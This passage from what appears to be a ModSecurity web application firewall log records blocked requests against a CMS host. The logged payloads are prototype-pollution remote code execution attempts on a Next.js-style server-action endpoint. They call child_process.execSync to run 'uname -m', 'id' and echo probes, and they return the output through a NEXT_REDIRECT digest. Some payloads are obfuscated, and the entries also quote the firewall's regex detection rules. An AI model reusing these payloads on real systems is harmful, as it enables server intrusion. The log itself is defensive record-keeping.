TEST$((6+7))TEST').toString();})();throw Object...."] [ve [hostname "www.cms-1.dev-unit.com"] [uri "/"] [unique_id "aXKeGIDcjBV5xEDNqy0rgAAAA1A"] [Fri Jan 23 01:32:23.559456 2026] [:error] [pid 15707:tid 15863] [client 13.228.32.26:10269] [client 13.228.32.26] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:[\\"\\\\'].*?[,].*(((v|(\\\\\\\\u0076)|(\\\\166)|(\\\\x76))[^a-z0-9]*(a|(\\\\\\\\u0061)|(\\\\141)|(\\\\x61))[^a-z0-9]*(l|(\\\\\\\\u006C)|(\\\\154)|(\\\\x6C))[^a-z0-9]*(u|(\\\\\\\\u0075)|(\\\\165)|(\\\\x75))[^a-z0-9]*(e|(\\\\\\\\u0065)|(\\\\145)|(\\\\x65))[^a-z0-9]*(O|(\\\\\\\\u004F)|(\\\\117)|(\\\\ ..." at ARGS:0. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_xss_attacks.conf"] [line "504"] [id "973347"] [rev "2"] [msg "IE XSS Filters - Attack Detected."] [data "Matched Data: \\x22then\\x22:\\x22$1:__proto__:then\\x22,\\x22status\\x22:\\x22resolved_model\\x22,\\x22reason\\x22:-1,\\x22value\\x22:\\x22{\\x5c\\x22then\\x5c\\x22:\\x5c\\x22$B1337\\x5c\\x22}\\x22,\\x22_response\\x22:{\\x22_prefix\\x22:\\x22var res=(function(){var _r=typeof require!=='undefined'?require:(process.mainModule?process.mainModule.require.bind(process.mainModule):(typeof globalThis.require!=='undefined'?globalThis.require:null));return _r('child_process').execSync('uname -m').toString();})();throw Object.assign(new Er..."] [ve [hostname "www.cms-1.dev-unit.com"] [uri "/"] [unique_id "aXKzh1gIUiO0ct1AZhp4PAAAARY"] [Fri Jan 23 01:32:25.661343 2026] [:error] [pid 15778:tid 15859] [client 13.228.32.26:26745] [client 13.228.32.26] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:[\\"\\\\'].*?[,].*(((v|(\\\\\\\\u0076)|(\\\\166)|(\\\\x76))[^a-z0-9]*(a|(\\\\\\\\u0061)|(\\\\141)|(\\\\x61))[^a-z0-9]*(l|(\\\\\\\\u006C)|(\\\\154)|(\\\\x6C))[^a-z0-9]*(u|(\\\\\\\\u0075)|(\\\\165)|(\\\\x75))[^a-z0-9]*(e|(\\\\\\\\u0065)|(\\\\145)|(\\\\x65))[^a-z0-9]*(O|(\\\\\\\\u004F)|(\\\\117)|(\\\\ ..." at ARGS:0. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_xss_attacks.conf"] [line "504"] [id "973347"] [rev "2"] [msg "IE XSS Filters - Attack Detected."] [data "Matched Data: \\x22then\\x22:\\x22$1:__proto__:then\\x22,\\x22status\\x22:\\x22resolved_model\\x22,\\x22reason\\x22:-1,\\x22value\\x22:\\x22{\\x5c\\x22then\\x5c\\x22:\\x5c\\x22$B1337\\x5c\\x22}\\x22,\\x22_response\\x22:{\\x22_prefix\\x22:\\x22var res=(function(){var _r=typeof require!=='undefined'?require:(process.mainModule?process.mainModule.require.bind(process.mainModule):(typeof globalThis.require!=='undefined'?globalThis.require:null));return _r('child_process').execSync('echo TEST$((6+7))TEST').toString();})();throw Object...."] [ve [hostname "www.cms-1.dev-unit.com"] [uri "/"] [unique_id "aXKziUDH73WjgbApWOHw7gAAAVU"] [Fri Jan 23 01:33:05.477350 2026] [:error] [pid 27498:tid 27516] [client 20.29.26.151:59070] [client 20.29.26.151] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:[\\"\\\\'].*?[,].*(((v|(\\\\\\\\u0076)|(\\\\166)|(\\\\x76))[^a-z0-9]*(a|(\\\\\\\\u0061)|(\\\\141)|(\\\\x61))[^a-z0-9]*(l|(\\\\\\\\u006C)|(\\\\154)|(\\\\x6C))[^a-z0-9]*(u|(\\\\\\\\u0075)|(\\\\165)|(\\\\x75))[^a-z0-9]*(e|(\\\\\\\\u0065)|(\\\\145)|(\\\\x65))[^a-z0-9]*(O|(\\\\\\\\u004F)|(\\\\117)|(\\\\ ..." at ARGS:0. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_xss_attacks.conf"] [line "504"] [id "973347"] [rev "2"] [msg "IE XSS Filters - Attack Detected."] [data "Matched Data: \\x22then\\x22:\\x22$1:__proto__:then\\x22,\\x22status\\x22:\\x22resolved_model\\x22,\\x22reason\\x22:-1,\\x22value\\x22:\\x22{\\x5c\\x22then\\x5c\\x22:\\x5c\\x22$B1337\\x5c\\x22}\\x22,\\x22_response\\x22:{\\x22_prefix\\x22:\\x22var res=(function(){var _r=typeof require!=='undefined'?require:(process.mainModule?process.mainModule.require.bind(process.mainModule):(typeof globalThis.require!=='undefined'?globalThis.require:null));return _r('child_process').execSync('uname -m').toString();})();throw Object.assign(new Er..."] [ve [hostname "www.cms-1.dev-unit.com"] [uri "/"] [unique_id "aXKzsSroIAtOpU7MrstpFAAAAMo"] [Fri Jan 23 01:33:06.080703 2026] [:error] [pid 27556:tid 27581] [client 20.29.26.151:59074] [client 20.29.26.151] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:[\\"\\\\'].*?[,].*(((v|(\\\\\\\\u0076)|(\\\\166)|(\\\\x76))[^a-z0-9]*(a|(\\\\\\\\u0061)|(\\\\141)|(\\\\x61))[^a-z0-9]*(l|(\\\\\\\\u006C)|(\\\\154)|(\\\\x6C))[^a-z0-9]*(u|(\\\\\\\\u0075)|(\\\\165)|(\\\\x75))[^a-z0-9]*(e|(\\\\\\\\u0065)|(\\\\145)|(\\\\x65))[^a-z0-9]*(O|(\\\\\\\\u004F)|(\\\\117)|(\\\\ ..." at ARGS:0. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_xss_attacks.conf"] [line "504"] [id "973347"] [rev "2"] [msg "IE XSS Filters - Attack Detected."] [data "Matched Data: \\x22then\\x22:\\x22$1:__proto__:then\\x22,\\x22status\\x22:\\x22resolved_model\\x22,\\x22reason\\x22:-1,\\x22value\\x22:\\x22{\\x5c\\x22then\\x5c\\x22:\\x5c\\x22$B1337\\x5c\\x22}\\x22,\\x22_response\\x22:{\\x22_prefix\\x22:\\x22var res=(function(){var _r=typeof require!=='undefined'?require:(process.mainModule?process.mainModule.require.bind(process.mainModule):(typeof globalThis.require!=='undefined'?globalThis.require:null));return _r('child_process').execSync('echo TEST$((6+7))TEST').toString();})();throw Object...."] [ve [hostname "www.cms-1.dev-unit.com"] [uri "/"] [unique_id "aXKzsn3JvK1c1JgSbKF0GwAAAZI"] [Fri Jan 23 01:59:37.634358 2026] [:error] [pid 15778:tid 15862] [client 3.232.237.169:58770] [client 3.232.237.169] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:[\\"\\\\'].*?[,].*(((v|(\\\\\\\\u0076)|(\\\\166)|(\\\\x76))[^a-z0-9]*(a|(\\\\\\\\u0061)|(\\\\141)|(\\\\x61))[^a-z0-9]*(l|(\\\\\\\\u006C)|(\\\\154)|(\\\\x6C))[^a-z0-9]*(u|(\\\\\\\\u0075)|(\\\\165)|(\\\\x75))[^a-z0-9]*(e|(\\\\\\\\u0065)|(\\\\145)|(\\\\x65))[^a-z0-9]*(O|(\\\\\\\\u004F)|(\\\\117)|(\\\\ ..." at ARGS:0. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_xss_attacks.conf"] [line "504"] [id "973347"] [rev "2"] [msg "IE XSS Filters - Attack Detected."] [data "Matched Data: \\x22then\\x22:\\x22$1:__proto__:then\\x22,\\x22status\\x22:\\x22resolved_model\\x22,\\x22reason\\x22:-1,\\x22value\\x22:\\x22{\\x5c\\x22then\\x5c\\x22:\\x5c\\x22$B1337\\x5c\\x22}\\x22,\\x22_response\\x22:{\\x22_prefix\\x22:\\x22var res=(function(){var _r=typeof require!=='undefined'?require:(process.mainModule?process.mainModule.require.bind(process.mainModule):(typeof globalThis.require!=='undefined'?globalThis.require:null));return _r('child_process').execSync('uname -m').toString();})();throw Object.assign(new Er..."] [ve [hostname "cms-1.dev-unit.com"] [uri "/"] [unique_id "aXK56UDH73WjgbApWOH6tgAAAVY"] [Fri Jan 23 01:59:37.978901 2026] [:error] [pid 15778:tid 15800] [client 3.232.237.169:58780] [client 3.232.237.169] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:[\\"\\\\'].*?[,].*(((v|(\\\\\\\\u0076)|(\\\\166)|(\\\\x76))[^a-z0-9]*(a|(\\\\\\\\u0061)|(\\\\141)|(\\\\x61))[^a-z0-9]*(l|(\\\\\\\\u006C)|(\\\\154)|(\\\\x6C))[^a-z0-9]*(u|(\\\\\\\\u0075)|(\\\\165)|(\\\\x75))[^a-z0-9]*(e|(\\\\\\\\u0065)|(\\\\145)|(\\\\x65))[^a-z0-9]*(O|(\\\\\\\\u004F)|(\\\\117)|(\\\\ ..." at ARGS:0. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_xss_attacks.conf"] [line "504"] [id "973347"] [rev "2"] [msg "IE XSS Filters - Attack Detected."] [data "Matched Data: \\x22then\\x22:\\x22$1:__proto__:then\\x22,\\x22status\\x22:\\x22resolved_model\\x22,\\x22reason\\x22:-1,\\x22value\\x22:\\x22{\\x5c\\x22then\\x5c\\x22:\\x5c\\x22$B1337\\x5c\\x22}\\x22,\\x22_response\\x22:{\\x22_prefix\\x22:\\x22var res=(function(){var _r=typeof require!=='undefined'?require:(process.mainModule?process.mainModule.require.bind(process.mainModule):(typeof globalThis.require!=='undefined'?globalThis.require:null));return _r('child_process').execSync('echo TEST$((6+7))TEST').toString();})();throw Object...."] [ve [hostname "cms-1.dev-unit.com"] [uri "/"] [unique_id "aXK56UDH73WjgbApWOH6twAAAUE"] [Fri Jan 23 02:00:06.814722 2026] [:error] [pid 15778:tid 15847] [client 201.207.52.25:52258] [client 201.207.52.25] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:[\\"\\\\'].*?[,].*(((v|(\\\\\\\\u0076)|(\\\\166)|(\\\\x76))[^a-z0-9]*(a|(\\\\\\\\u0061)|(\\\\141)|(\\\\x61))[^a-z0-9]*(l|(\\\\\\\\u006C)|(\\\\154)|(\\\\x6C))[^a-z0-9]*(u|(\\\\\\\\u0075)|(\\\\165)|(\\\\x75))[^a-z0-9]*(e|(\\\\\\\\u0065)|(\\\\145)|(\\\\x65))[^a-z0-9]*(O|(\\\\\\\\u004F)|(\\\\117)|(\\\\ ..." at ARGS:0. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_xss_attacks.conf"] [line "504"] [id "973347"] [rev "2"] [msg "IE XSS Filters - Attack Detected."] [data "Matched Data: \\x22then\\x22:\\x22$1:__proto__:then\\x22,\\x22status\\x22:\\x22resolved_model\\x22,\\x22reason\\x22:-1,\\x22value\\x22:\\x22{\\x5c\\x22then\\x5c\\x22:\\x5c\\x22$B1337\\x5c\\x22}\\x22,\\x22_response\\x22:{\\x22_prefix\\x22:\\x22var res=(function(){var _r=typeof require!=='undefined'?require:(process.mainModule?process.mainModule.require.bind(process.mainModule):(typeof globalThis.require!=='undefined'?globalThis.require:null));return _r('child_process').execSync('uname -m').toString();})();throw Object.assign(new Er..."] [ve [hostname "cms-1.dev-unit.com"] [uri "/"] [unique_id "aXK6BkDH73WjgbApWOH7BAAAAVE"] [Fri Jan 23 02:00:07.535451 2026] [:error] [pid 1269:tid 1280] [client 201.207.52.25:52272] [client 201.207.52.25] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:[\\"\\\\'].*?[,].*(((v|(\\\\\\\\u0076)|(\\\\166)|(\\\\x76))[^a-z0-9]*(a|(\\\\\\\\u0061)|(\\\\141)|(\\\\x61))[^a-z0-9]*(l|(\\\\\\\\u006C)|(\\\\154)|(\\\\x6C))[^a-z0-9]*(u|(\\\\\\\\u0075)|(\\\\165)|(\\\\x75))[^a-z0-9]*(e|(\\\\\\\\u0065)|(\\\\145)|(\\\\x65))[^a-z0-9]*(O|(\\\\\\\\u004F)|(\\\\117)|(\\\\ ..." at ARGS:0. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_xss_attacks.conf"] [line "504"] [id "973347"] [rev "2"] [msg "IE XSS Filters - Attack Detected."] [data "Matched Data: \\x22then\\x22:\\x22$1:__proto__:then\\x22,\\x22status\\x22:\\x22resolved_model\\x22,\\x22reason\\x22:-1,\\x22value\\x22:\\x22{\\x5c\\x22then\\x5c\\x22:\\x5c\\x22$B1337\\x5c\\x22}\\x22,\\x22_response\\x22:{\\x22_prefix\\x22:\\x22var res=(function(){var _r=typeof require!=='undefined'?require:(process.mainModule?process.mainModule.require.bind(process.mainModule):(typeof globalThis.require!=='undefined'?globalThis.require:null));return _r('child_process').execSync('echo TEST$((6+7))TEST').toString();})();throw Object...."] [ve [hostname "cms-1.dev-unit.com"] [uri "/"] [unique_id "aXK6B2GEvXZ9_gp7Z46CrwAAAoA"] [Fri Jan 23 07:21:27.027800 2026] [:error] [pid 5548:tid 5581] [client 51.195.62.119:55560] [client 51.195.62.119] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:[\\"\\\\'].*?[,].*(((v|(\\\\\\\\u0076)|(\\\\166)|(\\\\x76))[^a-z0-9]*(a|(\\\\\\\\u0061)|(\\\\141)|(\\\\x61))[^a-z0-9]*(l|(\\\\\\\\u006C)|(\\\\154)|(\\\\x6C))[^a-z0-9]*(u|(\\\\\\\\u0075)|(\\\\165)|(\\\\x75))[^a-z0-9]*(e|(\\\\\\\\u0065)|(\\\\145)|(\\\\x65))[^a-z0-9]*(O|(\\\\\\\\u004F)|(\\\\117)|(\\\\ ..." at ARGS:0. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_xss_attacks.conf"] [line "504"] [id "973347"] [rev "2"] [msg "IE XSS Filters - Attack Detected."] [data "Matched Data: \\x22then\\x22:\\x22$1:__proto__:then\\x22,\\x22status\\x22:\\x22resolved_model\\x22,\\x22reason\\x22:-1,\\x22value\\x22:\\x22{\\x5c\\x22then\\x5c\\x22:\\x5c\\x22$B1337\\x5c\\x22}\\x22,\\x22_response\\x22:{\\x22_prefix\\x22:\\x22var res=(function(){var _r=typeof require!=='undefined'?require:(process.mainModule?process.mainModule.require.bind(process.mainModule):(typeof globalThis.require!=='undefined'?globalThis.require:null));return _r('child_process').execSync('uname -m').toString();})();throw Object.assign(new Er..."] [ve [hostname "cms-1.dev-unit.com"] [uri "/"] [unique_id "aXMFVyyqUUD6MbnN4CjVjwAAAQc"] [Fri Jan 23 07:21:27.100957 2026] [:error] [pid 5548:tid 5606] [client 51.195.62.119:55574] [client 51.195.62.119] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:[\\"\\\\'].*?[,].*(((v|(\\\\\\\\u0076)|(\\\\166)|(\\\\x76))[^a-z0-9]*(a|(\\\\\\\\u0061)|(\\\\141)|(\\\\x61))[^a-z0-9]*(l|(\\\\\\\\u006C)|(\\\\154)|(\\\\x6C))[^a-z0-9]*(u|(\\\\\\\\u0075)|(\\\\165)|(\\\\x75))[^a-z0-9]*(e|(\\\\\\\\u0065)|(\\\\145)|(\\\\x65))[^a-z0-9]*(O|(\\\\\\\\u004F)|(\\\\117)|(\\\\ ..." at ARGS:0. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_xss_attacks.conf"] [line "504"] [id "973347"] [rev "2"] [msg "IE XSS Filters - Attack Detected."] [data "Matched Data: \\x22then\\x22:\\x22$1:__proto__:then\\x22,\\x22status\\x22:\\x22resolved_model\\x22,\\x22reason\\x22:-1,\\x22value\\x22:\\x22{\\x5c\\x22then\\x5c\\x22:\\x5c\\x22$B1337\\x5c\\x22}\\x22,\\x22_response\\x22:{\\x22_prefix\\x22:\\x22var res=(function(){var _r=typeof require!=='undefined'?require:(process.mainModule?process.mainModule.require.bind(process.mainModule):(typeof globalThis.require!=='undefined'?globalThis.require:null));return _r('child_process').execSync('echo TEST$((6+7))TEST').toString();})();throw Object...."] [ve [hostname "cms-1.dev-unit.com"] [uri "/"] [unique_id "aXMFVyyqUUD6MbnN4CjVkAAAARQ"] [Fri Jan 23 08:25:22.803800 2026] [:error] [pid 27839:tid 27866] [client 201.16.246.187:45826] [client 201.16.246.187] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:[\\"\\\\'].*?[,].*(((v|(\\\\\\\\u0076)|(\\\\166)|(\\\\x76))[^a-z0-9]*(a|(\\\\\\\\u0061)|(\\\\141)|(\\\\x61))[^a-z0-9]*(l|(\\\\\\\\u006C)|(\\\\154)|(\\\\x6C))[^a-z0-9]*(u|(\\\\\\\\u0075)|(\\\\165)|(\\\\x75))[^a-z0-9]*(e|(\\\\\\\\u0065)|(\\\\145)|(\\\\x65))[^a-z0-9]*(O|(\\\\\\\\u004F)|(\\\\117)|(\\\\ ..." at ARGS:0. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_xss_attacks.conf"] [line "504"] [id "973347"] [rev "2"] [msg "IE XSS Filters - Attack Detected."] [data "Matched Data: \\x22then\\x22:\\x22$1:__proto__:then\\x22,\\x22status\\x22:\\x22resolved_model\\x22,\\x22reason\\x22:-1,\\x22value\\x22:\\x22{\\x5c\\x22then\\x5c\\x22:\\x5c\\x22$B1337\\x5c\\x22}\\x22,\\x22_response\\x22:{\\x22_prefix\\x22:\\x22var res=(function(){var _r=typeof require!=='undefined'?require:(process.mainModule?process.mainModule.require.bind(process.mainModule):(typeof globalThis.require!=='undefined'?globalThis.require:null));return _r('child_process').execSync('uname -m').toString();})();throw Object.assign(new Er..."] [ve [hostname "www.cms-1.dev-unit.com"] [uri "/"] [unique_id "aXMUUrzFUg07V2GsFkeSrwAAANc"] [Fri Jan 23 08:25:23.768933 2026] [:error] [pid 5564:tid 5617] [client 201.16.246.187:46226] [client 201.16.246.187] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:[\\"\\\\'].*?[,].*(((v|(\\\\\\\\u0076)|(\\\\166)|(\\\\x76))[^a-z0-9]*(a|(\\\\\\\\u0061)|(\\\\141)|(\\\\x61))[^a-z0-9]*(l|(\\\\\\\\u006C)|(\\\\154)|(\\\\x6C))[^a-z0-9]*(u|(\\\\\\\\u0075)|(\\\\165)|(\\\\x75))[^a-z0-9]*(e|(\\\\\\\\u0065)|(\\\\145)|(\\\\x65))[^a-z0-9]*(O|(\\\\\\\\u004F)|(\\\\117)|(\\\\ ..." at ARGS:0. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_xss_attacks.conf"] [line "504"] [id "973347"] [rev "2"] [msg "IE XSS Filters - Attack Detected."] [data "Matched Data: \\x22then\\x22:\\x22$1:__proto__:then\\x22,\\x22status\\x22:\\x22resolved_model\\x22,\\x22reason\\x22:-1,\\x22value\\x22:\\x22{\\x5c\\x22then\\x5c\\x22:\\x5c\\x22$B1337\\x5c\\x22}\\x22,\\x22_response\\x22:{\\x22_prefix\\x22:\\x22var res=(function(){var _r=typeof require!=='undefined'?require:(process.mainModule?process.mainModule.require.bind(process.mainModule):(typeof globalThis.require!=='undefined'?globalThis.require:null));return _r('child_process').execSync('echo TEST$((6+7))TEST').toString();})();throw Object...."] [ve [hostname "www.cms-1.dev-unit.com"] [uri "/"] [unique_id "aXMUU3pxNQZhJlB6AF2M8QAAAVc"] [Fri Jan 23 09:03:52.846136 2026] [:error] [pid 27839:tid 27858] [client 167.71.57.89:58600] [client 167.71.57.89] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:[\\"\\\\'].*?[,].*(((v|(\\\\\\\\u0076)|(\\\\166)|(\\\\x76))[^a-z0-9]*(a|(\\\\\\\\u0061)|(\\\\141)|(\\\\x61))[^a-z0-9]*(l|(\\\\\\\\u006C)|(\\\\154)|(\\\\x6C))[^a-z0-9]*(u|(\\\\\\\\u0075)|(\\\\165)|(\\\\x75))[^a-z0-9]*(e|(\\\\\\\\u0065)|(\\\\145)|(\\\\x65))[^a-z0-9]*(O|(\\\\\\\\u004F)|(\\\\117)|(\\\\ ..." at ARGS:0. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_xss_attacks.conf"] [line "504"] [id "973347"] [rev "2"] [msg "IE XSS Filters - Attack Detected."] [data "Matched Data: \\x22then\\x22:\\x22$1:__proto__:then\\x22,\\x22status\\x22:\\x22resolved_model\\x22,\\x22reason\\x22:-1,\\x22value\\x22:\\x22{\\x5c\\x22then\\x5c\\x22:\\x5c\\x22$B1337\\x5c\\x22}\\x22,\\x22_response\\x22:{\\x22_prefix\\x22:\\x22var res=(function(){var _r=typeof require!=='undefined'?require:(process.mainModule?process.mainModule.require.bind(process.mainModule):(typeof globalThis.require!=='undefined'?globalThis.require:null));return _r('child_process').execSync('uname -m').toString();})();throw Object.assign(new Er..."] [ve [hostname "www.cms-1.dev-unit.com"] [uri "/"] [unique_id "aXMdWLzFUg07V2GsFkeY2QAAAM8"] [Fri Jan 23 09:03:53.041064 2026] [:error] [pid 27446:tid 27536] [client 167.71.57.89:58033] [client 167.71.57.89] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:[\\"\\\\'].*?[,].*(((v|(\\\\\\\\u0076)|(\\\\166)|(\\\\x76))[^a-z0-9]*(a|(\\\\\\\\u0061)|(\\\\141)|(\\\\x61))[^a-z0-9]*(l|(\\\\\\\\u006C)|(\\\\154)|(\\\\x6C))[^a-z0-9]*(u|(\\\\\\\\u0075)|(\\\\165)|(\\\\x75))[^a-z0-9]*(e|(\\\\\\\\u0065)|(\\\\145)|(\\\\x65))[^a-z0-9]*(O|(\\\\\\\\u004F)|(\\\\117)|(\\\\ ..." at ARGS:0. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_xss_attacks.conf"] [line "504"] [id "973347"] [rev "2"] [msg "IE XSS Filters - Attack Detected."] [data "Matched Data: \\x22then\\x22:\\x22$1:__proto__:then\\x22,\\x22status\\x22:\\x22resolved_model\\x22,\\x22reason\\x22:-1,\\x22value\\x22:\\x22{\\x5c\\x22then\\x5c\\x22:\\x5c\\x22$B1337\\x5c\\x22}\\x22,\\x22_response\\x22:{\\x22_prefix\\x22:\\x22var res=(function(){var _r=typeof require!=='undefined'?require:(process.mainModule?process.mainModule.require.bind(process.mainModule):(typeof globalThis.require!=='undefined'?globalThis.require:null));return _r('child_process').execSync('echo TEST$((6+7))TEST').toString();})();throw Object...."] [ve [hostname "www.cms-1.dev-unit.com"] [uri "/"] [unique_id "aXMdWYaswKPx1MGxruSTnwAAAFU"] [Sun Jan 25 23:04:56.621545 2026] [:error] [pid 10591:tid 10769] [client 23.180.120.132:35180] [client 23.180.120.132] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:\\\\b(?:(?:s(?:t(?:d(?:dev(_pop|_samp)?)?|r(?:_to_date|cmp))|u(?:b(?:str(?:ing(_index)?)?|(?:dat|tim)e)|m)|e(?:c(?:_to_time|ond)|ssion_user)|ys(?:tem_user|date)|ha(1|2)?|oundex|chema|ig?n|pace|qrt)|i(?:s(null|_(free_lock|ipv4_compat|ipv4_mapped|ipv4| ..." at ARGS:0. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "125"] [id "950001"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: trim( found within ARGS:0: {\\x22_response\\x22:{\\x22_chunks\\x22:\\x22$Q2\\x22,\\x22_formData\\x22:{\\x22get\\x22:\\x22$1:constructor:constructor\\x22},\\x22_prefix\\x22:\\x22var _nwdq=process.mainModule.require('child_process').execSync(Buffer.from('aWQ=','base64').toString()).toString().trim();var _ilis=Buffer.from(_nwdq).toString('base64');throw Object.assign(new Error('NEXT_REDIRECT'),{digest:`NEXT_REDIRECT;push;/login?a=${_ilis};307;`});\\x22},\\x22reason\\x22:-1,\\x22status\\x22:\\x22resolved_model\\x22,..."] [sever [hostname "cms-1.dev-unit.com"] [uri "/"] [unique_id "aXaFeHTJLg3zv-3QoTSgHgAAAQw"] [Sun Jan 25 23:04:56.684829 2026] [:error] [pid 10591:tid 10725] [client 23.180.120.132:35180] [client 23.180.120.132] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:\\\\b(?:(?:s(?:t(?:d(?:dev(_pop|_samp)?)?|r(?:_to_date|cmp))|u(?:b(?:str(?:ing(_index)?)?|(?:dat|tim)e)|m)|e(?:c(?:_to_time|ond)|ssion_user)|ys(?:tem_user|date)|ha(1|2)?|oundex|chema|ig?n|pace|qrt)|i(?:s(null|_(free_lock|ipv4_compat|ipv4_mapped|ipv4| ..." at ARGS:0. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "125"] [id "950001"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: trim( found within ARGS:0: {\\x22_response\\x22:{\\x22_chunks\\x22:\\x22$Q2\\x22,\\x22_formData\\x22:{\\x22get\\x22:\\x22$1:constructor:constructor\\x22},\\x22_prefix\\x22:\\x22var _lwsc=process['main' 'Module']['req' 'uire']('chi' 'ld_pro' 'cess')['exec' 'Sync'](Buffer.from('aWQ=','base64').toString()).toString().trim();var _fiqs=Buffer.from(_lwsc).toString('base64');throw Object.assign(new Error('NEXT_REDIRECT'),{digest:`NEXT_REDIRECT;push;/login?a=${_fiqs};307;`});\\x22},\\x22reason\\x22:-1,\\x22status\\x22..."] [sever [hostname "cms-1.dev-unit.com"] [uri "/"] [unique_id "aXaFeHTJLg3zv-3QoTSgHwAAAQA"] [Sun Jan 25 23:04:56.736914 2026] [:error] [pid 10591:tid 10798] [client 23.180.120.132:35180] [client 23.180.120.132] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:\\\\b(?:(?:s(?:t(?:d(?:dev(_pop|_samp)?)?|r(?:_to_date|cmp))|u(?:b(?:str(?:ing(_index)?)?|(?:dat|tim)e)|m)|e(?:c(?:_to_time|ond)|ssion_user)|ys(?:tem_user|date)|ha(1|2)?|oundex|chema|ig?n|pace|qrt)|i(?:s(null|_(free_lock|ipv4_compat|ipv4_mapped|ipv4| ..." at ARGS:0. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "125"] [id "950001"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: trim( found within ARGS:0: {\\x22_response\\x22:{\\x22_chunks\\x22:\\x22$Q2\\x22,\\x22_formData\\x22:{\\x22get\\x22:\\x22$1:constructor:constructor\\x22},\\x22_prefix\\x22:\\x22var _vwom=process.mainModule.require('child_process').execSync(Buffer.from('aWQ=','base64').toString()).toString().trim();var _avws=Buffer.from(_vwom).toString('base64');throw Object.assign(new Error('NEXT_REDIRECT'),{digest:`NEXT_REDIRECT;push;/login?a=${_avws};307;`});\\x22},\\x22reason\\x22:-1,\\x22status\\x22:\\x22resolved_model\\x22,..."] [sever [hostname "cms-1.dev-unit.com"] [uri "/en/"] [unique_id "aXaFeHTJLg3zv-3QoTSgIAAAARY"] [Sun Jan 25 23:04:56.784127 2026] [:error] [pid 10591:tid 10746] [client 23.180.120.132:35180] [client 23.180.120.132] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:\\\\b(?:(?:s(?:t(?:d(?:dev(_pop|_samp)?)?|r(?:_to_date|cmp))|u(?:b(?:str(?:ing(_index)?)?|(?:dat|tim)e)|m)|e(?:c(?:_to_time|ond)|ssion_user)|ys(?:tem_user|date)|ha(1|2)?|oundex|chema|ig?n|pace|qrt)|i(?:s(null|_(free_lock|ipv4_compat|ipv4_mapped|ipv4| ..." at ARGS:0. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "125"] [id "950001"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: trim( found within ARGS:0: {\\x22_response\\x22:{\\x22_chunks\\x22:\\x22$Q2\\x22,\\x22_formData\\x22:{\\x22get\\x22:\\x22$1:constructor:constructor\\x22},\\x22_prefix\\x22:\\x22var _czfs=process.mainModule.require('child_process').execSync(Buffer.from('aWQ=','base64').toString()).toString().trim();var _ccng=Buffer.from(_czfs).toString('base64');throw Object.assign(new Error('NEXT_REDIRECT'),{digest:`NEXT_REDIRECT;push;/login?a=${_ccng};307;`});\\x22},\\x22reason\\x22:-1,\\x22status\\x22:\\x22resolved_model\\x22,..."] [sever [hostname "cms-1.dev-unit.com"] [uri "/app/"] [unique_id "aXaFeHTJLg3zv-3QoTSgIQAAAQU"] [Sun Jan 25 23:04:56.831338 2026] [:error] [pid 10591:tid 10739] [client 23.180.120.132:35180] [client 23.180.120.132] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:\\\\b(?:(?:s(?:t(?:d(?:dev(_pop|_samp)?)?|r(?:_to_date|cmp))|u(?:b(?:str(?:ing(_index)?)?|(?:dat|tim)e)|m)|e(?:c(?:_to_time|ond)|ssion_user)|ys(?:tem_user|date)|ha(1|2)?|oundex|chema|ig?n|pace|qrt)|i(?:s(null|_(free_lock|ipv4_compat|ipv4_mapped|ipv4| ..." at ARGS:0. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "125"] [id "950001"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: trim( found within ARGS:0: {\\x22_response\\x22:{\\x22_chunks\\x22:\\x22$Q2\\x22,\\x22_formData\\x22:{\\x22get\\x22:\\x22$1:constructor:constructor\\x22},\\x22_prefix\\x22:\\x22var 